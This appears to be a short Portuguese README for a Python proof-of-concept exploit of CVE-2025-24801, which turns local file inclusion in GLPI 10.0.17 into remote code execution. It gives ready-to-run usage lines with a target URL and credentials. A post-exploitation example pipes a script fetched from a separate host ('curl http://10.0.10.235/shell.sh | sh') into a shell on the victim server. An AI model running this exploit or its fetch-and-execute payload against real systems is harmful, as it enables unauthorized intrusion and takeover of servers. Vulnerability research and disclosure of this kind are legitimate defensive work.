
Exploit em Python para CVE-2025-24801 que alcança Execução Remota de Código via Inclusão de Arquivo Local no GLPI 10.0.17. Inclui modo de execução de comandos para pós-exploração.
Este exploit usa CVE-2025-24801 para obter Execução Remota de Código (RCE) através de Inclusão Local de Arquivos (LFI) no GLPI 10.0.17. Prova de Conceito (PoC) desta CVE com explicação sobre esta vulnerabilidade no GLPI.
Algumas aplicações expõem o endpoint /glpi/ (ex.: http://172.16.11.130:8080/glpi/front/computer.form.php). Se a aplicação alvo incluir este endpoint, é necessário adicioná-lo ao parâmetro --url (ex.: --url http://172.16.11.130:8080/glpi).
Exemplo de uso.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password
Se você já executou este exploit e acionou RCE, você pode usar o parâmetro --cmd para executar apenas o comando.
python3 cve-2025-24801.py --url http://172.16.11.130:8080 --username glpi --password password --cmd "curl http://10.0.10.235/shell.sh | sh"